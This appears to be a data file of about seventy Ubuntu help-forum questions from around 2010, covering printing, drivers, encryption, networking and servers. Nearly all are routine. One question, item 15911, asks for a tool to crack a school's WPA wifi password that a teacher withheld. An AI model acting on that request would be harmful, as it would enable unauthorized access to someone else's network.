15752	blurry printed raster images with brother mfc-8840d	( note : crossposted here : ubuntuforums.org/showthread.php ? t=1621795 ) i 've got a brother mfc-8840d . works great with ubuntu server ! setting up a cups print server was pretty straightforward , and i also finally got network scanning working reliably with saned . printing documents and web pages works well : fonts are crisp/clear , etc . one issue has got me completely vexed : printing raster ( ie : jpg ) images . they are blurry . for example , i can scan a page of black and white text at 150 or 300 dpi . the grayscale image looks perfect on my monitor . but the printed version is much blurrier than the original , regardless of the `` print resolution '' dpi i choose . as a counterexample , if i use the `` copy '' function of the mfc-8840d , the copy looks excellent , and this function is much , much faster than if i scan then print a scan of same . i 've googled around a bunch and tried different tricks ( printing a pdf with the image from evince , printing with gimp , eog and other applications ) but i just ca n't print anything that looks as good as a copy made with the mfc-8840d . any ideas ? i 'm using ubuntu 10.04.1 lts server . i 'm using the ppd file from solutions.brother.com . thanks , -adam
15763	how will you do a desktop spread in unity ?	unity is supposed to be able to do a desktop spread ( similar to pressing super+w , where you get a view of all windows in the current workspace ) and a workspace spread ( similar to super+e , where you see all the workspaces ) . right now it 's easy to perform a workspace spread because it 's mapped to the workspace switcher , but desktop spread is supposed to become very relevant in unity at some point , so how will the user access it ? will it be mapped to the workspace switcher instead of the workspace switcher ? or will unity use an all-new effect halfway the two that exist now ?
15764	how can i load the standard wireless driver after i deinstall ndiswrapper ?	since i have some problems with my download speed under ubuntu ( see my other question ) i installed ndiswrapper to load windows driver for my wifi card . unfortunatly it did n't worked very well so i deinstalled ndiswrapper . but now in network-manager-applet the option to connect wifi is also gone . how can i load the standard wifi driver or even better how can i activate the wireless backports driver so that it works with network-manager-applet ? i found an advice via google to use sudo modprobe wl but this gives the message fatal : module wl not found .
15765	ushare does n't like the fact that eth0 is down even though i am using wlan0	i 'm trying to use ushare to share my music collection with my xbox . i am using the following command line : ushare -i wlan0 -x -c ~/music/ but i get the following as an error : interface eth0 is down . recheck ushare 's configuration and try again ! ioctl : can not assign requested address i have an ethernet adapter in my pc but it 's not connected . how can i get it to be happy with wlan0 ?
15774	encrypting a non-linux partition with luks	i have a non-linux partition i want to encrypt with luks . the goal is to be able to store it by itself on a device without linux and access it from the device when needed with an ubuntu live cd . i know luks ca n't encrypt partitions in place , so i created another , unformatted partition of the exact same size ( using gparted 's `` round to mib '' option ) and ran this command : sudo cryptsetup luksformat /dev/xxx where xxx is the partition 's device name . then i typed in my new passphrase and confirmed it . oddly , the command exited immediately after , so i guess it does n't encrypt the entire partition right away ? anyway , then i ran this command : sudo cryptsetup luksopen /dev/xxx xxx then i tried copying the contents of the existing partition ( call it yyy ) to the encrypted one like this : sudo dd if=/dev/yyy of=/dev/mapper/xxx bs=1mb and it ran for a while , but exited with this : dd : writing `/dev/mapper/xxx ' : no space left on device just before writing the last mb . i take this to mean the contents of yyy was truncated when it was copied to xxx , because i have dd 'd it before , and whenever i have dd 'd to a partition of the exact same size , i never get that error . ( and fdisk reports they are the same size in blocks ) . after a little googling i discovered all luksformat'ted partitions have a custom header followed by the encrypted contents . so it appears i need to create a partition exactly the size of the old one + however many bytes a luks header is . what size should the destination partition be , no . 1 , and no . 2 , am i even on the right track here ? update i found this in the luks faq : i think this is overly complicated . is there an alternative ? yes , you can use plain dm-crypt . it does not allow multiple passphrases , but on the plus side , it has zero on disk description and if you overwrite some part of a plain dm-crypt partition , exactly the overwritten parts are lost ( rounded up to sector borders ) . so perhaps i should n't be using luks at all ?
15775	how to configure startupmanager to show option to choose for different kernel versions during boot	i just installed startupmanager , but i does n't show my installed kernel versions to choose during boot ? how to enable this ?
15776	wireless network lost	i think i have auto updates enabled , but i 'm not sure . today , i lost my wireless connection icon i had in the panel and also lost my wireless network connect capabilities . i have windows as a back up but have found it is way too unreliable to use anymore and would love to get this working again . not sure why it would disappear but it is no longer auto connecting to the wireless network .
15780	how does one get the ttf-dejavu fonts to show up in xlsfonts for use in rxvt ?	i installed the ttf-dejavu package and can use the fonts in gnome-terminal . however , i want to use them in rxvt , but they do not show up with xlsfonts and rxvt reports `` ca n't load font '' when i try to use `` dejavu sans mono '' in .xdefaults . i found this confirmed bug ( # 574409 ) , but there is no workaround .
15782	how do i share a folder with another linux machine on the same home network ?	i 'm trying to share a folder on one ubuntu machine with another ubuntu machine on the same home network . when i right click on the folder and choose sharing options , it tells me i need to install windows network sharing services in order to share folders . what does windows have to do with this ? i 'm not trying to share with a windows machine ...
15783	check if a file has been uploaded ?	is there anyway for me to tell if a particular file has been uploaded from just my desktop ? i 'm using ubuntu and uploaded the file with chromium .
15785	change f key behavior on apple keyboard	pressing an f key on an apple keyboard is taken as a special keypress ( pause/play , skip track , etc. ) . to get it to be an actual f key press , you have to hold 'fn ' and press the key . i want to reverse this behavior . how can i do this ?
15789	re enable panel shadow	how can i re-enable panel shadow for both top and bottom ? ccsm does n't seems to work for me . any ideas ?
15794	direct boot to a named usb device	is there a method for adding an option line in the grub loader ( ubuntu 10.10 ) that directs the boot specifically to a named usb device ? if so , can you provide an example of the line to add ? this is for use in an office environment where people would prefer to select their boot options from a menu .
15795	how can you log out via the terminal ?	is there a command , that will take you back to the login screen ?
15799	trying to setup webserver and not able to access from outside network	so here 's the deal . i 'm new to apache and just installed it today . i got the dirs setup and when i type my ip address ( from my isp ) into a browser it pulls up the site fine , but when i try to access it from outside my home network using the same ip i get a 404 not found . i 've got port forwarding setup on my router for port 80 and my i checked with my isp to make sure they did n't block port 80 incoming connections . any ideas would be greatly appreciated .
15802	internet category not returning any results in synapse	i recently installed synapse and i noticed there is an internet category on the far right , but there it does n't return any results . what do i need to do to enable it to search my web browsing history ? i am using google chrome .
15803	how would one make empathy start when you turn on your computer or log into the computer	i am assuming that you need to put it in the startup applications , but i am not completely clear on how to do this .
15807	binary will not execute after upgrade to 10.10	before upgrading to 10.10 , i was able to execute a binary in my home directory simply by double-clicking it . now when i double-click it , i am told that no program is installed to run that type of file . here is my attempt to make it run via the command line . ~/blender25 $ ls -l total 37272 -rwxr-xr-x 1 mac9416 mac9416 38076379 2010-04-22 00:58 blender -rw-r -- r -- 1 mac9416 mac9416 5716 2009-06-18 12:31 copyright.txt -rw-r -- r -- 1 mac9416 mac9416 17992 2010-02-12 11:31 gpl-license.txt drwxr-xr-x 6 mac9416 mac9416 4096 2010-02-12 13:24 icons drwxr-xr-x 5 mac9416 mac9416 4096 2010-02-18 11:59 plugins -rw-r -- r -- 1 mac9416 mac9416 2396 2009-06-18 12:31 python-license.txt -rw-r -- r -- 1 mac9416 mac9416 6441 2010-03-09 00:39 readme.html ~/blender25 $ uname -m x86_64 ~/blender25 $ file blender blender : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , not stripped ~/blender25 $ ./blender bash : ./blender : no such file or directory as you can see , the file certainly exists , yet i am told that it does not . this has happened with another binary ; but with the other one i was given a permissions error . running chmod +x on it got me past that error , but i still get `` no such file or directory '' . so , what is preventing execution of these binaries in my directory in 10.10 ?
15811	type 1 fonts render poorly on-screen	some type 1 fonts , particularly urw palladio l , look rather ugly when rendered on-screen in various programs . in particular , the letter height is inconsistent . see the body text below , rendered in firefox : the header text is nimbus sans l , also a type 1 font ; in this sample , it 's looking acceptable , but sometimes its baseline is n't clean . i have this problem in most programs . openoffice and abiword both display it with urw palladio . i similarly have problems with nimbus sans embedded in pdfs displayed in evince . any suggestions as to how to fix this ? settings i can tweak somewhere to make it work properly ?
15812	install ubuntu on usb flash drive or usb powered external hdd ?	i was thinking of installing ubuntu on a couple of vms . would it be better to store each vm on a 8gb thumbdrive or store all the vms on a 320gb usb-powered external hdd ? which one would be faster ?
15814	set .jar default action to run with java ?	currently , with my install of ubuntu 10.10 , java jars by default open with file-roller . how can i set it so that when i double-click a jar in nautilus , it opens with sun java 6 ?
15816	deploying war files in tomcat6	i am using tomcat5.5 for a long on ubuntu servers 8.10 and 9.10 and /usr/share/tomcat/webapps/ is the path where i place my .war files and access them on the browser over network . on a sytem i 've installed tomcat6 and i 'm failing to find that where do i place my .war file of tomcat6 's webapps . i checked deploying war under /var/lib/tomcat6/webapps/ and the war file is extracted and i think this should be the location but i could not access the page when i tried http : //serverip:8080/myapp . i could access the default page properly when i navigate to http : //serverip:8080 . the same war file is working fine on tomcat servers which were not installed from apt repository . log messages : info : stopping coyote http/1.1 on http-8080 2 dec , 2010 10:06:29 am org.apache.coyote.http11.http11protocol init info : initializing coyote http/1.1 on http-8080 2 dec , 2010 10:06:29 am org.apache.catalina.startup.catalina load info : initialization processed in 523 ms 2 dec , 2010 10:06:29 am org.apache.catalina.core.standardservice start info : starting service catalina 2 dec , 2010 10:06:29 am org.apache.catalina.core.standardengine start info : starting servlet engine : apache tomcat/6.0.20 2 dec , 2010 10:06:30 am org.apache.catalina.startup.hostconfig deploywar info : deploying web application archive myapp.war 2 dec , 2010 10:06:32 am org.apache.catalina.core.standardcontext start severe : error listenerstart 2 dec , 2010 10:06:32 am org.apache.catalina.core.standardcontext start severe : context [ /myapp ] startup failed due to previous errors 2 dec , 2010 10:06:32 am org.apache.coyote.http11.http11protocol start info : starting coyote http/1.1 on http-8080 2 dec , 2010 10:06:32 am org.apache.catalina.startup.catalina start info : server startup in 3110 ms 2 dec , 2010 10:06:39 am org.apache.catalina.core.standardcontext start severe : error listenerstart 2 dec , 2010 10:06:39 am org.apache.catalina.core.standardcontext start severe : context [ /myapp ] startup failed due to previous error any help ?
15819	can you use the new beta adobe flash 10.2 in google chrome	just wondering is it possible to use the latest adobe flash build ( 10.2 ) in google chrome ? and what are the steps to achieve this ?
15820	how can i clean up the open with.. menu	i 've been using my desktop since the release of 10.10 , and as per usual its very cluttered . i spent a few hours today tidying the system , and i 've found a really annoying area that i 'm unaware of how to fix . the open with ... dialog contains several duplicates and even bunk entires . how can i remove these ? edit : i 've also stumbled across a great tutorial on this subject http : //greeennotebook.com/2010/11/clean-up-the-open-with-menu-in-ubuntu-10-10/
15826	squid or polipo	currently i am using squid3 on my netbook , which has an atom n450 processor and 1 gb of ram running ubuntu . the proxy is used to share the internet connection with a small group of pc 's ( 3 machines ) over ad-hoc wi-fi . another reason for using squid cache is to bring down data usage , as my internet connection come with a usage limit of 2 gbits per month . i found that squid3 is little heavier for my netbook , as the processor fan will be always active whenever squid is being used . i have plans to go for polipo , as it is lighweight , and better performance results according to this test . but in the documentation for polipo , there is no information about https support , and i always access sites which use https on my lan pc 's . so , would polipo be a better solution for my requirements ? efficient data caching is my first priority , and cached data should n't get deleted during reboots .
15827	recovering files from a corrupt cd/dvd	i have certain old cd/dvd 's which are not in good condition . i want to recover from them anything that can be recovered . in windows you had software like isobuster and cd recovery which will let me do this . can anyone suggest a native linux app ?
15829	how to extend ubuntu disk space without using live cd ?	i first installed windows 7 from factory , then installed ubuntu . i ran out of space , but there is a lot in windows partition . so i wanted to allocate some space from the windows partition to ubuntu partition with gparted . i burnt the live cd but ca n't reboot from cd rom . i tried to choose it from the bios menu ( by pressing f12 ) and also tried changing the boot order ( no floppy ) . is there a way to extend the ubuntu partition without using ubuntu live cdrom ?
15832	how do i get the cpu temperature ?	how do i get the cpu temperature .
15836	how to track the total data transfered in a month	i can see the data transferred ( internet download/upload ) in the current session from the system monitor . but i want something that keeps track of all the data transferred and i can see how much data was used in a month or two . preferably a gui tool .
15843	unison shows error about locked archives	i have installed unison to sync data between my two pcs but i am getting an error about a non existing file . here it is there is no such file in the .unison folder called lkb60 ... ... which is being complained .
15844	stopping daemons from loading at boot time	i want to stop some daemons from loading at boot time , specially squid3 . what is the best way of doing this ?
15848	in avant window navigation ( awn ) can the icons jump ?	in avant window navigation ( awn ) can the icons jump ? can the icons jump to call my attention if i receive a msg in messenger , or xchat , or if there a possibility to make them jump when i click on the icons ?
15852	amarok tool tips are just black boxes , is it possible to fix it ?	i use gnome . i want to use amarok , but tool tips are just black boxes in maverick . here 's what it looks like : is it possible to correct this by changing some settings or it is a bug ? i saw this - http : //ubuntuforums.org/showthread.php ? p=10186430 - on the ubuntu forums , but deleting the .kde folder did not help in my case and did n't seem to help any others either .
15853	how can a script check if it 's being run as root ?	i 'm writing a simple bash script , but i need it to check whether it 's being run as root or not . i know there 's probably a very simple way to do that , but i have no idea how . just to be clear : what 's a simple way to write a script foo.sh , so that the command ./foo.sh outputs 0 , and the command sudo ./foo.sh outputs 1 ?
15858	where can i download the latest version of the ambiance theme ?	where can i obtain the latest version of the ubuntu ambiance themes or ubuntu themes in general ? specifically i am looking for a download of the 10.10 ambiance theme for my 09.10 install and i have had no luck finding it with google .
15861	mount errors during early boot stages	i get the following error at the early boot stage ( soon after grub ) : mount : mounts none on /dev/pts failed : device or resource busy i have asked the same question before here . but i was not able to solve the issue . here is the output of the command grep -r `` /dev/pts '' * at /etc directory : apparmor/severity.db : /dev/pts/* 8 9 0 apparmor.d/abstractions/consoles : # program uses the /dev/pts/ interface , it actually has access to apparmor.d/abstractions/consoles : /dev/pts/ [ 0-9 ] * rw , apparmor.d/abstractions/consoles : /dev/pts/ r , grep : blkid.tab : no such file or directory init.d/umountnfs.sh : /|/proc|/dev|/dev/pts|/dev/shm|/proc/*|/sys|/lib/init/rw ) init.d/umountfs : /|/proc|/dev|/.dev|/dev/pts|/dev/shm|/dev/.static/dev|/proc/*|/sys|/lib/init/rw ) mtab : none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 rc0.d/k02umountfs : /|/proc|/dev|/.dev|/dev/pts|/dev/shm|/dev/.static/dev|/proc/*|/sys|/lib/init/rw ) rc0.d/s01umountnfs.sh : /|/proc|/dev|/dev/pts|/dev/shm|/proc/*|/sys|/lib/init/rw ) rc6.d/k02umountfs : /|/proc|/dev|/.dev|/dev/pts|/dev/shm|/dev/.static/dev|/proc/*|/sys|/lib/init/rw ) rc6.d/s01umountnfs.sh : /|/proc|/dev|/dev/pts|/dev/shm|/proc/*|/sys|/lib/init/rw )
15862	cpufreq-selector , cpufreq-info reporting wrong max speed	i 've just built a new machine with a core i5-760 cpu . max speed is 2.80ghz ( turbo mode notwithstanding ) . i 've also done a vanilla install of ubuntu 10.10 . i 've added the cpufreq-selector applet to the top panel , and its menus only allow me to select up to 2.39ghz . if i select the `` performance '' governor , it also shows 2.39ghz . cpufreq-info reports : $ cpufreq-info cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 2 3 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 1.20 ghz - 2.39 ghz available frequency steps : 2.39 ghz , 2.26 ghz , 2.13 ghz , 2.00 ghz , 1.86 ghz , 1.73 ghz , 1.60 ghz , 1.46 ghz , 1.33 ghz , 1.20 ghz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1.20 ghz and 2.39 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 1.20 ghz . cpufreq stats : 2.39 ghz:13.74 % , 2.26 ghz:0.09 % , 2.13 ghz:0.08 % , 2.00 ghz:0.08 % , 1.86 ghz:0.07 % , 1.73 ghz:0.07 % , 1.60 ghz:0.08 % , 1.46 ghz:0.08 % , 1.33 ghz:0.11 % , 1.20 ghz:85.61 % ( 15560 ) [ ... cpus 1-3 elided , but similar ... ] any idea how to get ubuntu and the various tools to recognise this as a 2.80ghz processor ? and ideally to report the actual speed when running in turbo mode too , but that 's not critical . edit : i should probably add that the bios ( & windows ) are quite happy that it 's a 2.80ghz cpu . thanks .
15865	how to install a second version of audacity ?	i 'm running the most recent version of audacity , 1.3.12 . i 'd like to install a second version ( 1.2.6 ) because there 's a filter i 'd like access to that only exists in that version . ( as i 'm only installing it for this reason , my 1.3.12 install needs to stay untouched . ) as a recent convert from windows xp , i 'm still a bit fuzzy on how ubuntu deals with installing files . can i just use the deb file from this page ? or will it muck up my current 1.3.12 installation ?
15868	what functionality of an ipad can i use with ubuntu ?	what functionality of an ipad can i use with ubuntu ? i 'm thinking about buying an ipad , but i only have ubuntu pcs these days ( no windows , no mac ) , and i 'm nervous that it may be too reliant on the existence of itunes . i 'm less concerned about getting media onto and off it ( and i have read that i can do this with libimobiledevice ) , but will i be able to activate it with itunes ? does it need to be usb synced on a regular basis , or can i do most anything i want through the cloud ( i.e . over wifi ) ? edit : in answer to jrgifford 's question , in theory , i 'd like to do everything i would want to do with it were i using windows/mac . but more specifically , i think i 'd want to : '' activate '' it , if that 's necessary copy music / video onto it install apps how much of this can i do without a windows/mac pc ? is it necessary to activate it ? i do n't think i 'm that interested in backing it up ( what would i back up ? ) , but then again , maybe i 'm confused as to how easy it is to get data on and off . can i get a regular sftp app for the ipad to copy data to my ubuntu machine over wi-fi , for example ?
15869	how to start vpn service manually ?	since this morning i can not connect to pptp vpn . when i click on networkmanager applet and select the vpn it says : vpn connection fail the vpn connection `` whatever '' failed because vpn service failed to start i google it , but the result did n't helped me . thanks in advance .
15873	mounting a network filesystem into schroot	i 'm using a network file system ( afs ) and i would like to also mount it into my schroot . adding a line to /etc/schroot/mount-defaults , with bind or rbind in the options did n't help : schroot always mounts the directory with bind , and it remains empty in the chroot . my current solution is a script that remounts the /afs directory with rbind after the schroot has been set up . is there a way to make schroot use rbind directly ?
15875	how do i setup routing through a pptp vpn ?	i have created a pptp connection back to my office , and managed to setup routing as suggested in this question , so that everything outside the office lan keeps going to my current default gateway . my problem is that i 'd like to access some hosts in the office that are on a different subnet . suppose i 'm on the 1.2.x.y/24subnet and through the vpn i can access the 192.168.2.x/24 subnet ( the office lan ) . i 'd like to access the office dmz at 192.168.0.x/24 through the vpn . how can i do that ? ( of course at the office the gateway on the lan knows how to reach the dmz ) .
15876	whats eating my memory ?	i often face the problem that something is eating away on my memory , but i ca n't put my finger on what it is . i have redis , mysql , ruby , php and apache running on the same server , it 's been running fine , but all of a sudden something is consuming too much memory . the top command does n't tell me anything that worries me . how can i find the problem ?
15877	force apt to remove all emacs*	i have a bug-problem with the apt-packages of emacs : > > error occurred processing debian-ispell.el : file error ( ( `` opening input file '' `` no such file or directory '' `` /usr/share/emacs23/site-lisp/dictionaries-common/debian-ispell.el '' ) ) > > error occurred processing ispell.el : file error ( ( `` opening input file '' `` no such file or directory '' `` /usr/share/emacs23/site-lisp/dictionaries-common/ispell.el '' ) ) > > error occurred processing flyspell.el : file error ( ( `` opening input file '' `` no such file or directory '' `` /usr/share/emacs23/site-lisp/dictionaries-common/flyspell.el '' ) ) emacs-install : /usr/lib/emacsen-common/packages/install/dictionaries-common emacs23 failed at /usr/lib/emacsen-common/emacs-install line 28 , < tsort > line 30. dpkg : error processing emacs23-lucid ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of emacs : emacs depends on emacs23 | emacs23-lucid | emacs23-nox ; however : package emacs23 is not installed . package emacs23-lucid which provides emacs23 is not configured yet . package emacs23-nox which provides emacs23 is not installed . package emacs23-lucid is not configured yet . package emacs23-nox is not installed . dpkg : error processing emacs ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : emacs23-lucid emacs e : sub-process /usr/bin/dpkg returned an error code ( 1 ) in fact i would be satisfied with just emacs23-nox , a couple of plugins - from apt . but i can neither -- purge nor -- purge reinstall , nor remove the packages . it always processes until this certain bug . i did some google-searching , found some stuff on launchpad suggesting : sudo apt-get install -- reinstall -- purge emacsen-common but this is the same ... so i hope there a way to tell app to just remove everything releated to emacs , and to start from scratch again ? thanks , marius
15882	what do i have to do to use nx on a different port than 22 ( ssh )	i have installed openssh server on my ubuntu linux box ( 10.04 ) . i can ssh to the box properly , no problem . i have to use port 443/tcp . no problem accessing a shell prompt with putty or other ssh client . hoewver , when i try to use nx to have a graphical session , it is not responding . i thought that nx is simply using the settings used by /etc/ssh/sshd_config . are there other parameters for nx that i should change so that it listens on port 443 ? i use nx from nomachine.com , and the version of all components is : 3.4.0-5 thanks : - )
15883	can i allow a virtualbox vm to use a usb wireless network adaptor directly ?	i have a windows 7 virtual machine running on the closed-source edition of virtualbox , which has usb support . i want the vm to directly access a usb wireless adaptor , but ca n't attach the adaptor because it is in use . in this case i do need windows to directly access the card and configure the wireless settings ; configuring it in ubuntu and bridging it will not suffice . as soon as i plug in the usb stick , network manager is a bit too keen and grabs hold of it . adding the below to /etc/networkmanager/nm-system-settings.conf does cause network manger to not automatically manage the adaptor yet it remains inaccessible to virtualbox . [ keyfile ] unmanaged-devices=mac:00:11:22:33:44:55 how can prevent anything from using the adaptor , so that i can attach it to the vm ?
15885	workaround for misbehaving battery notifier ( always estimating )	i know this is a known bug which has been asked before but i hope that until now there might be a fix or workaround to estimate the left battery . the battery is stuck on estimating on maverick , it was not an issue with lucid .
15890	how did ubuntu know my wpa key ?	i 've recently moved my /home to another computer ( keeping all configuration files ) , with a fresh installation of ubuntu 10.10 . after installation i 've installed wicd and ndiswrapper , to get my internet connection up and running . however , after changing /etc/network/interfaces from auto lo iface lo inet loopback to auto wlan0 iface wlan0 inet dhcp and running sudo /etc/init.d/networking restart to get wlan0 set up , wicd just suddenly connected ... to my modem . without supplying any information about the modem whatsoever . of course wicd creates a local directory at ~/.wicd/ , but that directory is empty , and the temporary global configuration at /var/lib/wicd/configurations/ did n't exist due to fresh installation of ubuntu . so what 's the deal ? where did wicd get the essid and the wpa key ? there has n't been any activity in this question , but it 's still open ( and even worth some rep ) !
15891	does ubuntu one sync symbolic links with windows ?	i noticed that the windows ubuntu one client currently does n't support folders outside of the main ~/ubuntu one folder . i 'm wondering if i can symlink to my other folders from within ~/ubuntu one and have ubuntu one synchronize them properly . if this is n't supported yet , is it planned for the future ?
15893	how to force testdrive to use zsync ?	while using testdrive gui , how to configure it to use zsync ? there seems to be no option to change that . or is there a config file somewhere which can be edited ?
15898	opera web browser in ubuntu software center	is opera web browser going to be offered via ubuntu software center ?
15911	cracking wpa wireless network encryption	my teacher wont tell me the password of the wifi so i am wondering if there is a tool to know the security password of wifi . i can see the name of network in the network manager but when i click on it , it asks me wpa and wpa2 personal security ... ..
15920	when will gnome 2.32.1 be available ?	when will gnome 2.32.1 packages be released on maverick ?
15922	download a flash video ( not from a popular video community )	there are a lot of tools to download videos from youtube , dailymotion , vimeo , etc . but i 'd be interested in a more generic way to download flash videos , for example the ones here : http : //www.canalplus.fr/index.php ? pid=3351
15926	how to avoid duplicate entries in .bash_history	the same command is listed in my history again and again . how can i avoid this ? i know it 's possible via histcontrol but i have n't found the right way .
15932	where do i get the source code for ubuntu light ?	where do i get the source code for ubuntu light ?
15933	how to access md raid via live cd ?	we are currently trying to run access the data on a server running a hp ml110 g5 sata raid controller , using the latest ubuntu live cd . we need to delete a few files to let the server boot into windows but are unable to mount the partitions . we can see the individual disks via the disk management program but can not mount the partitions , does anyone have any suggestions ?
15936	installing ubuntu 10.10 / windows 7 dual boot confusion	i had an ubuntu 9/windows 7 dual boot . ( i almost never use the windows side , actually . ) ubuntu was bugging me to update , so i tried it ( backing up everything first ) . somehow , the update failed ( i think because someone turned the computer off at the socket half way through ) . the computer now refuses to boot into ubuntu . now i have an ubuntu 10.10 install disk . i want to use it to overwrite the existing ubuntu installation , while leaving the windows installation alone . i got as far as the advanced `` select a partition '' section , but i had no way of knowing which partition was which . edit to add : what i have is /dev/sda /dev/sda1 nfts /dev/sda2 nfts /dev/sda5 ext4 /dev/sda6 swap so , i want to leave the nfts partitions alone ( why do i have two of them ? ) and install ubuntu 10.10 on /dev/sda5 . is that right ? i 'm not sure what /dev/sda6 is used for . what is a `` swap area '' anyway ? i think i 'll leave it alone . so i selected /dev/sda5 and told the installer to use it as the `` ext4 journaling file system '' . the install button lights up , but when i click it i 'm told that no root file system is defined . how do i go about defining a root file system ? gparted shows this slightly differently :
15938	slow usb transfer	the transfer of files to a usb device has been very slow . on dslreports.com , a guy has found its cause . the problem occurs when you plug a usb 1.1 device at the same usb hub where you are using the usb 2.0 device then it defaults to the lowest . is there a solution for it ? a solution where i can use both device at the same time without get slow transfer rate .
15943	hp laserjet 4l is not working	after i have installed ubuntu 10.10 my printer is not working anymore . my printer is connected through a parallel port . i was told that the cups have changed in maverick . is there any solution ?
15944	updating a mysql production server without having problems	i have a mysql server , ubuntu server 10.04 . it works great and we 're really happy about it . time for updates has come and i am sincerely scared : can i do a sudo apt-get dist-upgrade with light heart ? i thought that maybe using just security updates would be safer or i 'm just preoccupied about nothing ? in one single question : can i cause problems to production by updating my ubuntu server ?
15948	how can i request that a font be added to the official repositories ?	i think it would be beneficial to have the cardo font included in ubuntu 's official repositories . where can i make this kind of request ?
15957	dhcpd offers ip address but client does n't get ip	i set up a dhcpd on my ubuntu server with this configuration : please note that the ubuntu server which runs the dhcpd has a static ip of 192.168.1.50 default-lease-time 600 ; max-lease-time 7200 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; option routers 192.168.1.50 ; option domain-name-servers 192.168.1.50 ; option netbios-name-servers 192.168.1.50 ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.150 192.168.1.200 ; } now when i try to get an ip from the dhcpd server from my ubuntu client computer the server offers an ip from the pool of 192.168.1.150 but the client does n't seem to pick it up , instead it fires new requests until a timeout occurs : listening on lpf/eth0/00:24:8c:1d : fb:40 sending on lpf/eth0/00:24:8c:1d : fb:40 sending on socket/fallback dhcprelease on eth0 to 195.130.132.102 port 67 internet systems consortium dhcp client v3.1.3 copyright 2004-2009 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth0/00:24:8c:1d : fb:40 sending on lpf/eth0/00:24:8c:1d : fb:40 sending on socket/fallback dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 dhcpoffer of 192.168.1.150 from 192.168.1.50 dhcprequest of 192.168.1.150 on eth0 to 255.255.255.255 port 67 dhcprequest of 192.168.1.150 on eth0 to 255.255.255.255 port 67 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 5 dhcpoffer of 192.168.1.150 from 192.168.1.50 dhcprequest of 192.168.1.150 on eth0 to 255.255.255.255 port 67 dhcprequest of 192.168.1.150 on eth0 to 255.255.255.255 port 67 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 7 dhcpoffer of 192.168.1.150 from 192.168.1.50 dhcprequest of 192.168.1.150 on eth0 to 255.255.255.255 port 67 dhcprequest of 192.168.1.150 on eth0 to 255.255.255.255 port 67 ... tcpdump information : tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on eth0 , link-type en10mb ( ethernet ) , capture size 96 bytes 19:04:18.431422 ip 94.227.60.1.67 > 255.255.255.255.68 : bootp/dhcp , reply , length 300 19:05:10.316903 ip 94.224.188.1.67 > 255.255.255.255.68 : bootp/dhcp , reply , length 300 iptables information is the same for both server and client : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination any ideas ? ?
15960	is there an icon pack for nautilus right click menu ?	i saw in default gnome theme icons when i clicked right the mouse . the icons are very useful for orientation in the menu . see the picture below . how can i add some icons to standard ubuntu theme ? if there no icon pack how can i add my own icons ?
15963	why ca n't i hear audible pings ?	the ping manual says that ping -a will generate audible pings , but when i try this no sound is made . what am i doing wrong ?
15967	how can i get audiobooks from banshee 's 'internet archive ' plugin into my library ?	when i view an audiobook in the internet archive 'store ' in banshee , there is no option to add it to my library , or even to download the files . i can still stream these files but because i ca n't view them in my library , i ca n't get them onto my mp3 player . i am however able to download the files if i do so directly from archive.org . is this just a missing feature , or is there actually a reason for this ?
15968	how to edit together split-screen videos ?	with what software i can split the screen of a video ? putting like 3 videos at the same time in one video ... .here is an example of what i want to do http : //www.youtube.com/watch ? v=jynwhmaqrhq
15969	accessing googlecl using python script	i am trying to create a python gtk program which uses googlecl tools like listing google calendar appointments , accessing the google blog etc . however i do not know how to call the command in python gtk . the command for running googlecl in the terminal is google calendar list -- date 2010-12-02 this command would list all the appointments in google calendar on the 2nd of december if entered in the terminal . however i do not know how to make python gtk do the same thing . any help would be appreciated . googlecl is a command line tool released by google to facilate easy management of common tasks like google calendar , google blogger , google docs etc . you can find more info on code.google.com/p/googlecl/
15971	getting visual feedback of workspace switch in xfce	not sure if this is an appropriate question for this site , since it 's not really specific to ubuntu . those who feel it is n't should probably respond to my crosspost on the unix and linux stackexchange site . sorry for any confusion , i 'm still negotiating the borderlines between these sites ( and superuser.com , where i also crossposted ) . i guess we all are . i make heavy use of workspaces , and have a lot of them ( a 6x4 grid ) . i usually run openbox , but am currently using a machine that does n't have openbox set up , so i 'm using xfce because it 's already mostly configured to my liking . i 've gotten used to getting visual feedback when i switch workspaces , showing me which one i 've just moved to , and am finding myself a bit disoriented in xfce . in openbox this is a big heads-up display , which is pretty much ideal . i 'm aware that the workspace switcher panel applet will highlight the active workspace , but this only seems to work for workspaces which have some desktop space showing ; since i generally have all my windows maximized , this is n't super helpful . is there a way to enable visual feedback showing the new workspace when switching workspaces in xfce ?
15977	how do i get notified in my qt application about usb drive plugged in to the system	i am writing an application in qt 4.6/4.7 where in i need to copy some files from the usb drive the moment it is connected to the system . the application while it is running , should be able to detect that a pen drive is inserted and without the user intervention , should look into the usb drive for specific file and copy it to the local drive . this should happen every time a new pen drive is inserted . is there any simple method which i can use ? pls suggest . thanks in advance mahesh
15979	what program can i use to convert text into binary numbers ?	i need a gui application that shows the binary representation of text , using binary numbers , not hexadecimal numbers . any suggestions ? for example , the program should convert the text hi to 1001000 1101001 . i would prefer a graphical application to a command-line utility .
